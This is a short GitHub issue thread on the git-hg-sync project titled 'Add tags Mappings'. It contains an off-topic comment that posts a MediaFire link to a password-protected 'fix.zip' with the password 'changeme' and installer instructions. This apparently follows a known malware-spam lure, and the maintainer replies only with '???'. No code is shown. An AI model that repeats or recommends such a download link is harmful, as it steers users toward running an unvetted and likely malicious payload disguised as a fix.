### ISSUE TITLE
Add tags Mappings

### ISSUE THREAD

**Issue by djangoliv** [mozilla-conduit/git-hg-sync#10]
@fbessou

**Comment by Gross-Igna** [comment]
Download 
https://www.mediafire.com/file/7ybpxn8lil1av70/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by djangoliv** [comment]
> Download https://www.mediafire.com/file/7ybpxn8lil1av70/fix.zip/file password: changeme In the installer menu, select "gcc."

???
